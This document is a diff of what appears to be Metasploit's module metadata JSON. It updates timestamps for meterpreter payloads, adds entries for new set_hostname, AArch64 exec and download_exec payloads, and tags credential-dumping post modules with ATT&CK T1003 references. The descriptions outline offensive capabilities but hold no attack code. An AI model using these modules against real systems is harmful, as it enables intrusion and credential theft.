    "ref_name": "linux/ppc64le/meterpreter_reverse_https",
@@ -245933,7 +248546,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc64le/meterpreter_reverse_tcp",
@@ -245966,7 +248579,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/ppce500v2/meterpreter_reverse_http",
@@ -245999,7 +248612,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/ppce500v2/meterpreter_reverse_https",
@@ -246032,7 +248645,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppce500v2/meterpreter_reverse_tcp",
@@ -246332,7 +248945,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter_reverse_http",
@@ -246365,7 +248978,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter_reverse_https",
@@ -246398,7 +249011,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter_reverse_tcp",
@@ -246473,6 +249086,37 @@
    "payload_type": 1,
    "staged": false
  },
+  "payload_linux/x64/set_hostname": {
+    "name": "Linux Set Hostname",
+    "fullname": "payload/linux/x64/set_hostname",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Muzaffer Umut ŞAHİN <mailatmayinlutfen@gmail.com>"
+    ],
+    "description": "Sets the hostname of the machine.",
+    "references": [],
+    "platform": "Linux",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-07-05 15:57:38 +0000",
+    "path": "/modules/payloads/singles/linux/x64/set_hostname.rb",
+    "is_install_path": true,
+    "ref_name": "linux/x64/set_hostname",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 1,
+    "staged": false
+  },
  "payload_linux/x64/shell/bind_tcp": {
    "name": "Linux Command Shell, Bind TCP Stager",
    "fullname": "payload/linux/x64/shell/bind_tcp",
@@ -247231,7 +249875,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/meterpreter_reverse_http",
@@ -247264,7 +249908,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/meterpreter_reverse_https",
@@ -247297,7 +249941,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/meterpreter_reverse_tcp",
@@ -247328,7 +249972,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-08 10:19:25 +0000",
    "path": "/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/metsvc_bind_tcp",
@@ -247359,7 +250003,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-08 10:19:25 +0000",
    "path": "/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/metsvc_reverse_tcp",
@@ -247988,7 +250632,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/zarch/meterpreter_reverse_http",
@@ -248021,7 +250665,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/zarch/meterpreter_reverse_https",
@@ -248054,7 +250698,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/zarch/meterpreter_reverse_tcp",
@@ -248383,7 +251027,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/osx/aarch64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "osx/aarch64/meterpreter_reverse_http",
@@ -248417,7 +251061,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/osx/aarch64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "osx/aarch64/meterpreter_reverse_https",
@@ -248451,7 +251095,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/osx/aarch64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "osx/aarch64/meterpreter_reverse_tcp",
@@ -249182,7 +251826,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "osx/x64/meterpreter_reverse_http",
@@ -249215,7 +251859,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "osx/x64/meterpreter_reverse_https",
@@ -249248,7 +251892,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "osx/x64/meterpreter_reverse_tcp",
@@ -250116,7 +252760,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-09 07:19:14 +0000",
    "path": "/modules/payloads/singles/php/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "php/meterpreter_reverse_tcp",
@@ -253058,6 +255702,46 @@
    "payload_type": 1,
    "staged": false
  },
+  "payload_windows/aarch64/exec": {
+    "name": "Windows AArch64 Command Execution",
+    "fullname": "payload/windows/aarch64/exec",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "alanfoster",
+      "Alexander \"xaitax\" Hagenah"
+    ],
+    "description": "Executes an arbitrary command on a Windows on ARM (AArch64) target.\n          This payload is a foundational example of position-independent shellcode for the AArch64 architecture.\n          It dynamically resolves the address of the `WinExec` function from `kernel32.dll` by parsing the\n          Process Environment Block (PEB) and the module's Export Address Table (EAT) at runtime.\n          This technique avoids static imports and hardcoded function addresses, increasing resilience.",
+    "references": [],
+    "platform": "Windows",
+    "arch": "aarch64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-06-30 14:46:51 +0000",
+    "path": "/modules/payloads/singles/windows/aarch64/exec.rb",
+    "is_install_path": true,
+    "ref_name": "windows/aarch64/exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "screen-effects"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 1,
+    "staged": false
+  },
  "payload_windows/adduser": {
    "name": "Windows Execute net user /ADD",
    "fullname": "payload/windows/adduser",
@@ -256065,7 +258749,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-08 10:19:25 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_bind_named_pipe",
@@ -256100,7 +258784,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-08 10:19:25 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_bind_tcp",
@@ -256135,7 +258819,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-08 10:19:25 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_reverse_http",
@@ -256170,7 +258854,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-08 10:19:25 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_reverse_https",
@@ -256205,7 +258889,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-08 10:19:25 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_reverse_ipv6_tcp",
@@ -256240,7 +258924,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-08 10:19:25 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_reverse_tcp",
@@ -256271,7 +258955,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-08 10:19:25 +0000",
    "path": "/modules/payloads/singles/windows/metsvc_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/metsvc_bind_tcp",
@@ -256302,7 +258986,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-08 10:19:25 +0000",
    "path": "/modules/payloads/singles/windows/metsvc_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/metsvc_reverse_tcp",
@@ -261573,6 +264257,37 @@
    "stage_refname": "windows/x64/custom",
    "stager_refname": "windows/x64/reverse_winhttps"
  },
+  "payload_windows/x64/download_exec": {
+    "name": "Windows Download Execute",
+    "fullname": "payload/windows/x64/download_exec",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Muzaffer Umut ŞAHİN <mailatmayinlutfen@gmail.com>"
+    ],
+    "description": "Downloads and executes the file from the specified url.",
+    "references": [],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-08-12 11:39:44 +0000",
+    "path": "/modules/payloads/singles/windows/x64/download_exec.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/download_exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 1,
+    "staged": false
+  },
  "payload_windows/x64/encrypted_shell/reverse_tcp": {
    "name": "Windows Command Shell, Encrypted Reverse TCP Stager",
    "fullname": "payload/windows/x64/encrypted_shell/reverse_tcp",
@@ -262300,7 +265015,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-08 10:19:25 +0000",
    "path": "/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/meterpreter_bind_named_pipe",
@@ -262335,7 +265050,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-08 10:19:25 +0000",
    "path": "/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/meterpreter_bind_tcp",
@@ -262370,7 +265085,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-08 10:19:25 +0000",
    "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/meterpreter_reverse_http",
@@ -262405,7 +265120,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-08 10:19:25 +0000",
    "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/meterpreter_reverse_https",
@@ -262440,7 +265155,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-08 10:19:25 +0000",
    "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/meterpreter_reverse_ipv6_tcp",
@@ -262475,7 +265190,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-08 10:19:25 +0000",
    "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/meterpreter_reverse_tcp",
@@ -263869,14 +266584,16 @@
      "theLightCosine <theLightCosine@metasploit.com>"
    ],
    "description": "Post module to dump the password hashes for all users on an AIX system.",
-    "references": [],
+    "references": [
+      "ATT&CK-T1003.008"
+    ],
    "platform": "AIX",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-26 16:28:15 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/aix/hashdump.rb",
    "is_install_path": true,
    "ref_name": "aix/hashdump",
@@ -263949,7 +266666,8 @@
    "description": "Post Module to dump the password hashes for Android System. Root is required.\n          To perform this operation, two things are needed.  First, a password.key file\n          is required as this contains the hash but no salt.  Next, a sqlite3 database\n          is needed (with supporting files) to pull the salt from.  Combined, this\n          creates the hash we need.  Samsung based devices change the hash slightly.",
    "references": [
      "URL-https://www.pentestpartners.com/security-blog/cracking-android-passwords-a-how-to/",
-      "URL-https://hashcat.net/forum/thread-2202.html"
+      "URL-https://hashcat.net/forum/thread-2202.html",
+      "ATT&CK-T1003"
    ],
    "platform": "Android",
    "arch": "",
@@ -263957,7 +266675,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-27 01:56:49 +0000",
+    "mod_time": "2025-09-08 17:30:59 +0000",
    "path": "/modules/post/android/gather/hashdump.rb",
    "is_install_path": true,
    "ref_name": "android/gather/hashdump",
@@ -264360,14 +267078,16 @@
      "bcoles <bcoles@gmail.com>"
    ],
    "description": "Post module to dump the password hashes for all users on a BSD system.",
-    "references": [],
+    "references": [
+      "ATT&CK-T1003.008"
+    ],
    "platform": "BSD",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-27 02:09:41 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/bsd/gather/hashdump.rb",
    "is_install_path": true,
    "ref_name": "bsd/gather/hashdump",
@@ -265969,7 +268689,8 @@
    "references": [
      "URL-https://github.com/rbowes-r7/refreshing-mcp-tool",
      "URL-https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/",
-      "URL-https://support.f5.com/csp/article/K97843387"
+      "URL-https://support.f5.com/csp/article/K97843387",
+      "ATT&CK-T1003"
    ],
    "platform": "Linux,Unix",
    "arch": "",
@@ -265977,7 +268698,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-13 09:23:28 +0000",
+    "mod_time": "2025-09-08 17:30:59 +0000",
    "path": "/modules/post/linux/gather/f5_loot_mcp.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/f5_loot_mcp",
@@ -266132,14 +268853,16 @@
      "Carlos Perez <carlos_perez@darkoperator.com>"
    ],
    "description": "Post Module to dump the password hashes for all users on a Linux System",
-    "references": [],
+    "references": [
+      "ATT&CK-T1003.008"
+    ],
    "platform": "Linux",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-27 12:23:56 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/linux/gather/hashdump.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/hashdump",
@@ -266176,7 +268899,8 @@
    "description": "This module gathers the encrypted passwords stored by Password Manager\n          Pro and decrypt them using key materials stored in multiple\n          configuration files.",
    "references": [
      "URL-https://www.trustedsec.com/blog/the-curious-case-of-the-password-database/",
-      "URL-https://github.com/trustedsec/Zoinks/blob/main/zoinks.py"
+      "URL-https://github.com/trustedsec/Zoinks/blob/main/zoinks.py",
+      "ATT&CK-T1003"
    ],
    "platform": "Linux,Unix",
    "arch": "",
@@ -266184,7 +268908,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-02 14:03:15 +0000",
+    "mod_time": "2025-09-08 17:30:59 +0000",
    "path": "/modules/post/linux/gather/manageengine_password_manager_creds.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/manageengine_password_manager_creds",
@@ -266222,7 +268946,9 @@
      "URL-https://github.com/huntergregal/mimipenguin",
      "URL-https://bugs.launchpad.net/ubuntu/+source/gnome-keyring/+bug/1772919",
      "URL-https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1717490",
-      "CVE-2018-20781"
+      "CVE-2018-20781",
+      "ATT&CK-T1003.007",
+      "ATT&CK-T1003.008"
    ],
    "platform": "Linux",
    "arch": "x86, x64, aarch64",
@@ -266230,7 +268956,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-13 09:23:28 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/linux/gather/mimipenguin.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/mimipenguin",
@@ -266302,7 +269028,8 @@
    ],
    "description": "This module grab OpenVPN credentials from a running process\n          in Linux.\n\n          Note: --auth-nocache must not be set in the OpenVPN command line.",
    "references": [
-      "URL-https://gist.github.com/rvrsh3ll/cc93a0e05e4f7145c9eb#file-openvpnscraper-sh"
+      "URL-https://gist.github.com/rvrsh3ll/cc93a0e05e4f7145c9eb#file-openvpnscraper-sh",
+      "ATT&CK-T1003.007"
    ],
    "platform": "Linux",
    "arch": "",
@@ -266310,7 +269037,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-02 23:29:48 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/linux/gather/openvpn_credentials.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/openvpn_credentials",
@@ -266549,7 +269276,8 @@
      "URL-https://github.com/shmilylty/vhost_password_decrypt",
      "CVE-2022-22948",
      "URL-https://pentera.io/blog/information-disclosure-in-vmware-vcenter/",
-      "URL-https://github.com/ErikWynter/metasploit-framework/blob/vcenter_gather_postgresql/modules/post/multi/gather/vmware_vcenter_gather_postgresql.rb"
+      "URL-https://github.com/ErikWynter/metasploit-framework/blob/vcenter_gather_postgresql/modules/post/multi/gather/vmware_vcenter_gather_postgresql.rb",
+      "ATT&CK-T1003"
    ],
    "platform": "Linux,Unix",
    "arch": "",
@@ -266557,7 +269285,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-04-12 13:09:34 +0000",
+    "mod_time": "2025-09-08 17:30:59 +0000",
    "path": "/modules/post/linux/gather/vcenter_secrets_dump.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/vcenter_secrets_dump",
@@ -270962,14 +273690,16 @@
      "joev <joev@metasploit.com>"
    ],
    "description": "This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. Supports\n          versions 10.3 to 10.14.",
-    "references": [],
+    "references": [
+      "ATT&CK-T1003"
+    ],
    "platform": "OSX",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-01 02:49:28 +0000",
+    "mod_time": "2025-09-08 17:30:59 +0000",
    "path": "/modules/post/osx/gather/hashdump.rb",
    "is_install_path": true,
    "ref_name": "osx/gather/hashdump",
@@ -271596,14 +274326,16 @@
      "Carlos Perez <carlos_perez@darkoperator.com>"
    ],
    "description": "Post module to dump the password hashes for all users on a Solaris system.",
-    "references": [],
+    "references": [
+      "ATT&CK-T1003.008"
+    ],
    "platform": "Solaris",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-30 00:19:25 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/solaris/gather/hashdump.rb",
    "is_install_path": true,
    "ref_name": "solaris/gather/hashdump",
@@ -272221,7 +274953,8 @@
    ],
    "description": "This module uses the registry to extract the stored domain hashes that have been\n          cached as a result of a GPO setting. The default setting on Windows is to store\n          the last ten successful logins.",
    "references": [
-      "URL-https://web.archive.org/web/20220407023137/https://lab.mediaservice.net/code/cachedump.rb"
+      "URL-https://web.archive.org/web/20220407023137/https://lab.mediaservice.net/code/cachedump.rb",
+      "ATT&CK-T1003.005"
    ],
    "platform": "Windows",
    "arch": "",
@@ -272229,7 +274962,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-30 11:23:07 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/windows/gather/cachedump.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/cachedump",
@@ -272667,14 +275400,16 @@
      "tebo <tebo@attackresearch.com>"
    ],
    "description": "This module harvests credentials found on the host and stores them in the database.",
-    "references": [],
+    "references": [
+      "ATT&CK-T1003"
+    ],
    "platform": "Windows",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-28 09:08:33 +0000",
+    "mod_time": "2025-09-08 17:30:59 +0000",
    "path": "/modules/post/windows/gather/credentials/credential_collector.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/credential_collector",
@@ -272746,14 +275481,16 @@
      "theLightCosine <theLightCosine@metasploit.com>"
    ],
    "description": "This module attempts to copy the NTDS.dit database from a live Domain Controller\n          and then parse out all of the User Accounts. It saves all of the captured password\n          hashes, including historical ones.",
-    "references": [],
+    "references": [
+      "ATT&CK-T1003.003"
+    ],
    "platform": "Windows",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-28 09:08:33 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/windows/gather/credentials/domain_hashdump.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/domain_hashdump",
@@ -272867,14 +275604,16 @@
      "Kx499"
    ],
    "description": "This module will enumerate the Microsoft Credential Store and decrypt the\n          credentials. This module can only access credentials created by the user the\n          process is running as.  It cannot decrypt Domain Network Passwords, but will\n          display the username and location.",
-    "references": [],
+    "references": [
+      "ATT&CK-T1003"
+    ],
    "platform": "Windows",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-06-20 13:20:44 +0000",
+    "mod_time": "2025-09-08 17:30:59 +0000",
    "path": "/modules/post/windows/gather/credentials/enum_cred_store.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/enum_cred_store",
@@ -272905,14 +275644,16 @@
      "Ben Campbell <eat_meatballs@hotmail.co.uk>"
    ],
    "description": "This module will recover the LAPS (Local Administrator Password Solution) passwords,\n          configured in Active Directory, which is usually only accessible by privileged users.\n          Note that the local administrator account name is not stored in Active Directory,\n          so it is assumed to be 'Administrator' by default.",
-    "references": [],
+    "references": [
+      "ATT&CK-T1003"
+    ],
    "platform": "Windows",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-28 09:08:33 +0000",
+    "mod_time": "2025-09-08 17:30:59 +0000",
    "path": "/modules/post/windows/gather/credentials/enum_laps.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/enum_laps",
@@ -275074,14 +277815,16 @@
      "Ben Campbell <eat_meatballs@hotmail.co.uk>"
    ],
    "description": "This module will collect cleartext Single Sign On credentials from the Local\n          Security Authority using the Kiwi (Mimikatz) extension. Blank passwords will not be stored\n          in the database.",
-    "references": [],
+    "references": [
+      "ATT&CK-T1003.001"
+    ],
    "platform": "Windows",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-28 09:08:33 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/windows/gather/credentials/sso.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/sso",
@@ -275773,7 +278516,8 @@
    "description": "This module extracts the plain-text Windows user login password in Registry.\n          It exploits a Windows feature that Windows (2000 to 2008 R2) allows a\n          user or third-party Windows Utility tools to configure User AutoLogin via\n          plain-text password insertion in (Alt)DefaultPassword field in the registry\n          location - HKLM\\Software\\Microsoft\\Windows NT\\WinLogon. This is readable\n          by all users.",
    "references": [
      "URL-http://support.microsoft.com/kb/315231",
-      "URL-http://core.yehg.net/lab/#tools.exploits"
+      "URL-http://core.yehg.net/lab/#tools.exploits",
+      "ATT&CK-T1003"
    ],
    "platform": "Windows",
    "arch": "",
@@ -275781,7 +278525,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-28 09:08:33 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/post/windows/gather/credentials/windows_autologin.rb",
    "is_install_path": true,
